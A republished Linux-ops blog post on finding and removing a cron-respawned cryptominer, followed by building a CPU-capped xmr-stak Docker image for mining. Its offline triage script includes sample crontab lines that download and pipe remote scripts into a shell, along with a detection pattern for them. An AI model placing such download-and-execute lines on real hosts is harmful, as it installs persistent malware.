How I Detected and Stopped a Hidden Crypto‑Mining Malware on My Linux Server

A Linux ops engineer troubleshoots persistent 502 errors, traces them to a rogue process named cranberry that a parent process keeps respawning and a malicious crontab job keeps re‑downloading, removes the malware, then looks at the underlying xmr‑stak CPU mining tool and builds a Docker image so the mining workload can be run under control.

MaGe Linux Operations

Origin

One afternoon the production system began returning frequent 502 errors and extremely slow responses.

Initial suspicion fell on a colleague downloading large files, but other sites loaded quickly and the link was carrying only about 80 Mb of traffic, so bandwidth was ruled out and the cause remained unclear.

Problem Solving

After SSH‑ing into the server, top showed a process named cranberry consuming almost all CPU.

Killing the process stopped it only for a moment; it was immediately restarted.

Listing the crontab revealed the mechanism: a malicious entry that periodically downloaded a script from a remote server and executed it. (On a real host check every user's crontab -l as well as /etc/crontab, /etc/cron.d and /var/spool/cron, not just root's.)

Removing the crontab entry stopped the periodic download, but cranberry still came back after each kill, so something already running on the box was respawning it.

Walking up the process tree to the parent that had executed the downloaded script, and killing that parent first, finally halted the malware; once the respawner was gone, killing cranberry again made it stay dead and the system stabilized.

Further inspection uncovered additional mining trojans, which were removed the same way: find the cron entry, find the parent, kill the parent, then the miner.
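The triage loop above, written out as shell that runs offline. This is an added example, not the article's own commands: it walks a constructed ps snapshot and a constructed crontab (the process names, PIDs and the 198.51.100.23 address are made up) through the same three checks: find the CPU hog, walk its parent chain so the respawner is killed before the miner, and pull out cron entries that fetch something from the network and pipe it into a shell. On a live host feed it the output of `ps -eo pid,ppid,pcpu,comm --no-headers` and of `crontab -l` for each user plus /etc/crontab and /etc/cron.d/*.

```shell
#!/bin/sh
# Added example (not the article's commands): offline triage of a respawning miner.
# The ps snapshot, crontab and 198.51.100.23 below are constructed test data.

# Constructed `ps -eo pid,ppid,pcpu,comm --no-headers` output: pid ppid %cpu comm
SAMPLE_PS='1 0 0.0 systemd
812 1 0.0 sshd
901 1 0.1 crond
2310 901 0.0 sh
2315 2310 0.2 watchdog.sh
2400 2315 398.7 cranberry'

# Constructed crontab; the two download-and-execute lines are the kind the article found
SAMPLE_CRONTAB='# m h dom mon dow command
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/10 * * * * curl -fsSL http://198.51.100.23/x.sh | sh
*/5 * * * * wget -q -O- http://198.51.100.23/cr.sh | bash'

# pid of the process with the highest %cpu in a snapshot (what top showed at a glance)
top_cpu_pid() {
    printf '%s\n' "$1" | awk 'BEGIN { max = -1 } $3 > max { max = $3; pid = $1 } END { print pid }'
}

# "pid comm" for a process and every ancestor up to pid 1, leaf first.
# Killing only the leaf is pointless while a parent respawns it; the chain
# shows which parent to stop first (here watchdog.sh, spawned from cron).
ancestry() {
    pid=$1
    snapshot=$2
    while [ "$pid" -gt 0 ]; do
        line=$(printf '%s\n' "$snapshot" | awk -v p="$pid" '$1 == p { print $1, $2, $4; exit }')
        [ -n "$line" ] || break          # pid not in snapshot: stop walking
        set -- $line                     # $1=pid $2=ppid $3=comm
        printf '%s %s\n' "$1" "$3"
        pid=$2
    done
}

# Crontab lines that fetch from the network and hand the result to a shell.
# Catches the common `curl ... | sh` / `wget -O- ... | bash` shape; comment lines are skipped.
suspicious_cron_lines() {
    printf '%s\n' "$1" | grep -v '^[[:space:]]*#' | grep -E '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh([[:space:]]|$)'
}

# Demo against the constructed data
hog=$(top_cpu_pid "$SAMPLE_PS")
echo "CPU hog: pid $hog"
echo "Ancestry (leaf first):"
ancestry "$hog" "$SAMPLE_PS"
echo "Cron entries that download and execute:"
suspicious_cron_lines "$SAMPLE_CRONTAB"
```

The ancestry walk is the step that matters: in the constructed data cranberry is a child of watchdog.sh, which is the process to kill first. The cron pattern is deliberately narrow (download piped straight into a shell); a dropper that saves to disk and runs the file later will not match it, so read the whole listing rather than trusting the filter.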

The Road to Wealth

While analyzing the malware, the engineer identified the miner as xmr‑stak's CPU backend.

Two GitHub repositories were referenced: the unified xmr‑stak miner and the older CPU‑only xmr‑stak‑cpu that it superseded:

https://github.com/fireice-uk/xmr-stak

https://github.com/fireice-uk/xmr-stak-cpu

A test machine was prepared to build a Docker image for the miner.

The original script builds a Docker image that installs xmr‑stak on CentOS or Ubuntu. The engineer modified it so the container is kept after the run instead of being discarded, and stripped the CUDA‑related sections, since the GPU backend is not needed for CPU mining.

Running the adjusted script builds the image and starts the miner. After entering the coin type, pool address and wallet in the guided setup, the miner connects to the pool.

The miner's web interface shows mining progress.

After the container is stopped, two files, cpu.txt and config.txt, appear alongside the miner binary in the bin directory; xmr‑stak writes its generated configuration into the directory it is run from.

With those files present the miner can be restarted without re‑entering the settings.

CPU usage in the test rose to about 10 %. An unthrottled miner will take whatever CPU it is given, which is exactly the load that was behind the 502 errors, so cap the container's CPU if you run one.
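The image build and the container run, as an added example rather than the article's script. It builds a CPU‑only xmr‑stak from the repository linked above and runs it under a Docker CPU quota, which is the control a mining container needs if it is not to do to your host what cranberry did. Assumptions not in the article: ubuntu:18.04 as the base image, /opt/xmr-stak on the host for the generated config files, and port 16000 for the miner's HTTP interface; Docker and network access to GitHub are needed for the build, and nothing is built or started unless the script is invoked with `build` or `run`.

```shell
#!/bin/sh
# Added example, not the article's script. Builds a CPU-only xmr-stak image and runs it
# under a cgroup CPU quota. Assumed (not from the article): ubuntu:18.04 base image,
# /opt/xmr-stak host directory for the generated config, HTTP interface on port 16000.
# Nothing is built or started unless invoked as:  sh mine.sh build   or   sh mine.sh run 2
set -eu

IMAGE=xmr-stak-cpu:local
CONF_DIR=/opt/xmr-stak      # host directory; xmr-stak writes config.txt, pools.txt, cpu.txt to its cwd
HTTP_PORT=16000             # assumed: the port answered in the guided setup for the web interface

# Dockerfile for a CPU-only build: CUDA and OpenCL are switched off at cmake time,
# the equivalent of stripping the CUDA sections from the original script.
dockerfile_text() {
    cat <<'EOF'
FROM ubuntu:18.04
RUN apt-get update \
    && apt-get install -y --no-install-recommends \
        git ca-certificates cmake build-essential libmicrohttpd-dev libssl-dev libhwloc-dev \
    && rm -rf /var/lib/apt/lists/*
RUN git clone --depth 1 https://github.com/fireice-uk/xmr-stak.git /src \
    && mkdir /src/build && cd /src/build \
    && cmake .. -DCUDA_ENABLE=OFF -DOpenCL_ENABLE=OFF \
    && make install \
    && install -m 0755 bin/xmr-stak /usr/local/bin/xmr-stak
WORKDIR /opt/xmr-stak
ENTRYPOINT ["xmr-stak"]
EOF
}

# The `docker run` line for a miner capped at $1 CPUs. --cpus is the cgroup quota that
# keeps the miner from taking the whole host; the bind mount keeps the generated config
# on the host so a restart needs no re-entry; -it is for the first run, when xmr-stak
# asks for currency, pool and wallet.
run_command() {
    printf 'docker run -it --name xmr-stak --restart unless-stopped --cpus=%s --memory=512m -p %s:%s -v %s:/opt/xmr-stak %s\n' \
        "$1" "$HTTP_PORT" "$HTTP_PORT" "$CONF_DIR" "$IMAGE"
}

case "${1:-}" in
    build) dockerfile_text | docker build -t "$IMAGE" -f - . ;;
    run)   mkdir -p "$CONF_DIR"; eval "$(run_command "${2:-1}")" ;;
esac
```

`sh mine.sh run 2` starts the miner limited to two CPUs' worth of quota; raise or lower the number to match what the host can spare. Because the config directory is a bind mount, the cpu.txt and config.txt the guided setup writes survive the container being stopped and removed.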

With sufficient compute power, the mining operation can become a lucrative side‑project.

Some content sourced from 51CTO bloggers feelgood3000 and storysky.
Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact admin@besthub.dev and we will review it promptly.

Tags: Linux, Malware Removal, crypto mining, xmr-stak
Written by

MaGe Linux Operations

Founded in 2009, MaGe Education is a top Chinese high‑end IT training brand. Its graduates earn 12K+ RMB salaries, and the school has trained tens of thousands of students. It offers high‑pay courses in Linux cloud operations, Python full‑stack, automation, data analysis, AI, and Go high‑concurrency architecture. Thanks to quality courses and a solid reputation, it has talent partnerships with numerous internet firms.
